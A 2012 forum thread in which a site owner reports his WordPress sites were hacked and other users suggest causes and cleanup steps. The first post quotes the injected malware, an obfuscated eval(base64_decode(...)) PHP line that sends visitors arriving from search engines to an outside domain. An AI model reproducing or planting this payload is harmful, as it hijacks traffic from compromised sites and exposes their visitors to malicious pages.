1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Being Hacked F$$$KJ$K$JK

Discussion in 'Black Hat SEO' started by ibmethatswhoib, Feb 15, 2012.

  1. ibmethatswhoib

    ibmethatswhoib Jr. VIP Jr. VIP Premium Member

    Joined:
    Feb 17, 2011
    Messages:
    1,560
    Likes Received:
    1,155
    Occupation:
    Staying Informed
    Location:
    Bay Area, Ca
    Home Page:
    What the fuck, this godamn mother fucker hacked multiple sites of mine. How the hell did they hack multiple sites and how the hell did my host let this happen? He installed this on almost all of my php files. I had my sites updated with the latest wordpress and had security plugins.

    eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZnJvbGluZy5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));

    I know this is going to take forever and I'm losing money. FUCK what do I do?
     
  2. BlueTurtle

    BlueTurtle BANNED BANNED

    Joined:
    Nov 30, 2011
    Messages:
    700
    Likes Received:
    1,307
    Do you mean how do you get rid of this and get your sites back to normal or how do you prevent it happening again?
     
  3. navero

    navero Newbie

    Joined:
    Jan 9, 2012
    Messages:
    2
    Likes Received:
    0
    Lemme help you, type base64 decoder in google, then go to hack forums, make a new account, check search for anything related to script kiddies :p. problem solved
     
  4. BlueTurtle

    BlueTurtle BANNED BANNED

    Joined:
    Nov 30, 2011
    Messages:
    700
    Likes Received:
    1,307
    It's a Joomla hack.

    Here's a fix:

    http://www.kiveo.net/blog/joomla-osa-pl-code-injection/

    Actually he seems to be attacking multiple holes, it could be one of many.

    If it's wordpress you're using try this http://www.xphp.info/security/new-threat-pokosa-malware/
     
    • Thanks Thanks x 1
  5. BlueTurtle

    BlueTurtle BANNED BANNED

    Joined:
    Nov 30, 2011
    Messages:
    700
    Likes Received:
    1,307
    Also, I'd recommend you study this and implement all of it http://codex.wordpress.org/Hardening_WordPress
     
  6. GraveDigger00

    GraveDigger00 Registered Member

    Joined:
    Jul 24, 2011
    Messages:
    88
    Likes Received:
    9
    Location:
    ND, USA
    It can also be injected into WordPress, I have had similar code on my sites. I had a horrible hosting company, and their shared servers overall were getting exploited and then my sites as well, multiple times. I moved my sites to new hosting, and it hasten happened since, shocking... It could also be timthumb being exploited if a WordPress theme. Make sure to update all of your themes and plugins and versions, and change your passwords as well.
     
  7. ibmethatswhoib

    ibmethatswhoib Jr. VIP Jr. VIP Premium Member

    Joined:
    Feb 17, 2011
    Messages:
    1,560
    Likes Received:
    1,155
    Occupation:
    Staying Informed
    Location:
    Bay Area, Ca
    Home Page:
    Thanks for all the replies, ya it's wordpress and I'm using different themes for sites that got hacked. It could be a plugin, I don't understand why the screen is white with a 0. It's not re-directing any traffic to anywhere so why did they hack my sites? Just to mess with people? I don't see a reason.
     
  8. n3xus

    n3xus Junior Member

    Joined:
    Apr 19, 2009
    Messages:
    121
    Likes Received:
    31
    honestly sometimes people pull this shit for the pure enjoyment of being a dick. just like those bastards that make viruses just to fuck with people. its sad that they use their intelligence for such purposes
     
  9. BlueTurtle

    BlueTurtle BANNED BANNED

    Joined:
    Nov 30, 2011
    Messages:
    700
    Likes Received:
    1,307
    It's a pretty widespread attack so the site has probably been taken down now.

    It was most likely something like a browser exploit to build a botnet or install adware/malware/crapware/cockware
     
  10. phpbuilt

    phpbuilt Jr. VIP Jr. VIP

    Joined:
    May 16, 2011
    Messages:
    1,650
    Likes Received:
    5,208
    Occupation:
    $ from websites I own.
    Location:
    putting monkeys in paypal
    White screen with a 0 means your default wordpress template got deleted out of your wp database, or doesn't exist anymore ... to fix it just go into wordpress backend and select a theme (should fix it).

    What was your host? Justhost is notorious for this. It could have gotten in through the host.

    It might have gotten in through your templates. For instance, even if wordpress is fully up to date with all plugins ... it is possible that your wordpress theme (if it is an old one) would rely on something like timthumbs, which was exploited ... and you need a new copy of that template with a fixed timthumbs or you can always be hacked (just updating wordpress and plugins/widgets are not enough). Stay away from templates that are no longer supported.
     
    • Thanks Thanks x 1
  11. phpbuilt

    phpbuilt Jr. VIP Jr. VIP

    Joined:
    May 16, 2011
    Messages:
    1,650
    Likes Received:
    5,208
    Occupation:
    $ from websites I own.
    Location:
    putting monkeys in paypal
    That theme could be using timthumbs. Timthumbs is something that many theme developers insert into their themes to help them automatically resize images (for instance, it will take the first image in your post and resize it to a thumbnail that can be stuck on your homepage with a description of the article).

    http://blog.trendmicro.com/attacks-target-timthumb-vulnerability/ (article about timthumbs vulnerability).

    If it is not timthumbs, it could be something similar. I would suggest that you switch off the templates that are giving you problems, or find updated versions of those same templates which are sure to be fixed.
     
  12. macdonjo3

    macdonjo3 Jr. VIP Jr. VIP Premium Member

    Joined:
    Nov 8, 2009
    Messages:
    5,560
    Likes Received:
    4,316
    Location:
    Toronto
    Home Page:
    It happens. If you're with host winds, just email them and they'll help you sort it out.
     
  13. ibmethatswhoib

    ibmethatswhoib Jr. VIP Jr. VIP Premium Member

    Joined:
    Feb 17, 2011
    Messages:
    1,560
    Likes Received:
    1,155
    Occupation:
    Staying Informed
    Location:
    Bay Area, Ca
    Home Page:
    Well it sounds like I'm screwed. I have ipage and they're saying that it's my problem and I need to re-install everything. I noticed that code is all over all the php files and in some it's 30 or 40 times. I backed up my databases and I have all my images. I know I have to sync up my database with my domain. So all my content should be in my database right? I'm just not sure what is the best and least painful way of doing all this for 6 sites. Does the content just show up under the right permalinks? I'm just lost on what to do now or what to start with. FML, any help would be good.
     
  14. resistancee

    resistancee Registered Member

    Joined:
    Jun 22, 2011
    Messages:
    99
    Likes Received:
    40
    First clean your pc. Boot into safe mode, clean with malware malbytes and combofixer. Once your clean contact your host for FTP logs. Find out what he edited, remove the code he added or files he's added and install Eset nod32!
     
  15. PHustler

    PHustler Jr. VIP Jr. VIP Premium Member

    Joined:
    Feb 17, 2010
    Messages:
    164
    Likes Received:
    17
    Let this be a warning to everyone.....BACKUP YOUR SITES!!!!
     
  16. ibmethatswhoib

    ibmethatswhoib Jr. VIP Jr. VIP Premium Member

    Joined:
    Feb 17, 2011
    Messages:
    1,560
    Likes Received:
    1,155
    Occupation:
    Staying Informed
    Location:
    Bay Area, Ca
    Home Page:
    ya I made sure my pc was clean I ran it with multiple tools like crazy. Not sure I can remove all the code, like I said it's in pretty much every php file 30 or 40 times. I'll check the ftp logs and check out eset nod32 thanks. I think it was an automated thing cuz other sites I have weren't affected.

    and yes backup your sites, databases and everything you can. This really sucks.

     
    Last edited: Feb 16, 2012
  17. wanfirdaus

    wanfirdaus Regular Member

    Joined:
    Dec 6, 2010
    Messages:
    357
    Likes Received:
    132
    Occupation:
    IM
    Location:
    WP Login
    Home Page:
    can they restore yesterdays backup?
     
  18. raven123

    raven123 Regular Member

    Joined:
    Jan 18, 2012
    Messages:
    456
    Likes Received:
    277
    You should post your host here so people can safely move before something like this happens again. I hope like hell it isn't bluehost...

    I usually use BackUpWordpress to counter these situations. I get my sites mailed to me several times every day. Take a not of this.
     
  19. Dumper

    Dumper Supreme Member

    Joined:
    Mar 20, 2009
    Messages:
    1,390
    Likes Received:
    484
    Location:
    Perdido Key
    Yeah everytime i change something i back it up. If your host can't help you then there's not much else you can do other then move on and kick them fuckers to the curb. Get hostgator...
     
  20. ibmethatswhoib

    ibmethatswhoib Jr. VIP Jr. VIP Premium Member

    Joined:
    Feb 17, 2011
    Messages:
    1,560
    Likes Received:
    1,155
    Occupation:
    Staying Informed
    Location:
    Bay Area, Ca
    Home Page:
    I have ipage and they SUCK, don't use them. They're slow to start, customer service sucks and they haven't helped at all. I have db backup that sends me emails too and have all my latest ones. I'm just not sure, do I just erase everything in the ftp folders, re-install wordpress and then I should be good? This is a dumb question but do databases contain all your posts and images? I guess I'm just not sure what I should delete overwrite and everything.
     
    • Thanks Thanks x 1